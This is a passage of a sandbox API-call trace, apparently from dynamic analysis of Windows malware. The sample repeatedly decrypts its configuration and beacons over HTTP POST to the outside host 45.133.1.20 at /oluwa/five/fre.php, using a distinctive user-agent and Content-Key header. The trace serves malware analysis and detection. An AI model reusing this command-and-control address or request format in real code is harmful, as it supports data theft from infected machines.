lpMem=0x6c5b38 | out: hHeap=0x6a0000) returned 1 [0198.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.486] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0198.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.488] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0198.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.494] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0198.494] GetProcessHeap () returned 0x6a0000 [0198.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.496] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.497] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.498] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.499] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.499] GetProcessHeap () returned 0x6a0000 [0198.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0198.499] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.500] GetProcessHeap () returned 0x6a0000 [0198.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0198.500] GetProcessHeap () returned 0x6a0000 [0198.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.501] GetProcessHeap () returned 0x6a0000 [0198.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0198.501] GetProcessHeap () returned 0x6a0000 [0198.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0198.502] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.502] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.509] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0198.518] GetProcessHeap () returned 0x6a0000 [0198.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0198.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.520] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0198.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.521] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.522] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.522] GetProcessHeap () returned 0x6a0000 [0198.523] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0198.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.524] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0198.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.525] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0198.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.526] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0198.526] GetProcessHeap () returned 0x6a0000 [0198.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.527] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.527] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0198.528] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.529] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0198.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.530] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0198.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.532] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0198.532] GetProcessHeap () returned 0x6a0000 [0198.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0198.533] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0198.533] GetProcessHeap () returned 0x6a0000 [0198.533] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9c0 [0198.533] socket (af=2, type=1, protocol=6) returned 0x510 [0198.533] connect (s=0x510, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0198.557] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0198.557] GetProcessHeap () returned 0x6a0000 [0198.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0198.557] GetProcessHeap () returned 0x6a0000 [0198.557] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0198.558] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.559] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.559] GetProcessHeap () returned 0x6a0000 [0198.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0198.559] GetProcessHeap () returned 0x6a0000 [0198.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0198.560] GetProcessHeap () returned 0x6a0000 [0198.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0198.560] GetProcessHeap () returned 0x6a0000 [0198.560] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0198.562] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.562] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.563] GetProcessHeap () returned 0x6a0000 [0198.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0198.563] GetProcessHeap () returned 0x6a0000 [0198.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0198.563] send (s=0x510, buf=0x6b5c98*, len=242, flags=0) returned 242 [0198.564] send (s=0x510, buf=0x6bb998*, len=159, flags=0) returned 159 [0198.564] GetProcessHeap () returned 0x6a0000 [0198.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0198.564] recv (in: s=0x510, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0198.640] GetProcessHeap () returned 0x6a0000 [0198.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0198.641] GetProcessHeap () returned 0x6a0000 [0198.641] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0198.641] GetProcessHeap () returned 0x6a0000 [0198.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0198.642] GetProcessHeap () returned 0x6a0000 [0198.642] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0198.642] closesocket (s=0x510) returned 0 [0198.643] GetProcessHeap () returned 0x6a0000 [0198.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9c0 | out: hHeap=0x6a0000) returned 1 [0198.643] GetProcessHeap () returned 0x6a0000 [0198.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.643] GetProcessHeap () returned 0x6a0000 [0198.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0198.643] GetProcessHeap () returned 0x6a0000 [0198.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0198.644] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xafc) returned 0x510 [0198.648] Sleep (dwMilliseconds=0xea60) [0198.650] GetProcessHeap () returned 0x6a0000 [0198.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0198.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.663] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0198.681] GetProcessHeap () returned 0x6a0000 [0198.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0198.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.682] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0198.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.684] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.685] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.685] GetProcessHeap () returned 0x6a0000 [0198.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0198.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.687] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0198.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.688] CryptDestroyKey (hKey=0x6ad020) returned 1 [0198.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.690] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0198.690] GetProcessHeap () returned 0x6a0000 [0198.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.691] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.693] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.694] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.695] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.695] GetProcessHeap () returned 0x6a0000 [0198.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0198.695] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.696] GetProcessHeap () returned 0x6a0000 [0198.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0198.696] GetProcessHeap () returned 0x6a0000 [0198.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.697] GetProcessHeap () returned 0x6a0000 [0198.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0198.697] GetProcessHeap () returned 0x6a0000 [0198.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0198.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.698] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0198.714] GetProcessHeap () returned 0x6a0000 [0198.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0198.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.715] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0198.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.716] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.718] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.718] GetProcessHeap () returned 0x6a0000 [0198.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0198.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.719] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0198.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.721] CryptDestroyKey (hKey=0x6ad020) returned 1 [0198.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.722] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0198.722] GetProcessHeap () returned 0x6a0000 [0198.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.723] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0198.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.725] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0198.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.726] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0198.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.727] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0198.727] GetProcessHeap () returned 0x6a0000 [0198.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0198.727] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0198.727] GetProcessHeap () returned 0x6a0000 [0198.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0198.727] socket (af=2, type=1, protocol=6) returned 0x514 [0198.728] connect (s=0x514, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0198.757] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0198.757] GetProcessHeap () returned 0x6a0000 [0198.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0198.758] GetProcessHeap () returned 0x6a0000 [0198.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0198.758] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.760] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.760] GetProcessHeap () returned 0x6a0000 [0198.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0198.760] GetProcessHeap () returned 0x6a0000 [0198.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0198.760] GetProcessHeap () returned 0x6a0000 [0198.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0198.761] GetProcessHeap () returned 0x6a0000 [0198.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0198.762] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0198.763] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.763] GetProcessHeap () returned 0x6a0000 [0198.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0198.763] GetProcessHeap () returned 0x6a0000 [0198.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0198.763] send (s=0x514, buf=0x6b5c98*, len=242, flags=0) returned 242 [0198.764] send (s=0x514, buf=0x6bb998*, len=159, flags=0) returned 159 [0198.764] GetProcessHeap () returned 0x6a0000 [0198.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0198.764] recv (in: s=0x514, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0198.831] GetProcessHeap () returned 0x6a0000 [0198.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0198.833] GetProcessHeap () returned 0x6a0000 [0198.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0198.834] GetProcessHeap () returned 0x6a0000 [0198.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0198.834] GetProcessHeap () returned 0x6a0000 [0198.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0198.835] closesocket (s=0x514) returned 0 [0198.835] GetProcessHeap () returned 0x6a0000 [0198.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0198.836] GetProcessHeap () returned 0x6a0000 [0198.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0198.836] GetProcessHeap () returned 0x6a0000 [0198.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0198.836] GetProcessHeap () returned 0x6a0000 [0198.836] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0198.837] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13dc) returned 0x514 [0198.839] Sleep (dwMilliseconds=0xea60) [0198.840] GetProcessHeap () returned 0x6a0000 [0198.840] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0198.841] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.841] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.870] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0198.882] GetProcessHeap () returned 0x6a0000 [0198.882] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0198.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.883] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0198.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.889] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.890] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.890] GetProcessHeap () returned 0x6a0000 [0198.891] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0198.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.892] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0198.893] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.894] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0198.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0198.895] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0198.895] GetProcessHeap () returned 0x6a0000 [0198.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0198.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0198.899] StrStrA 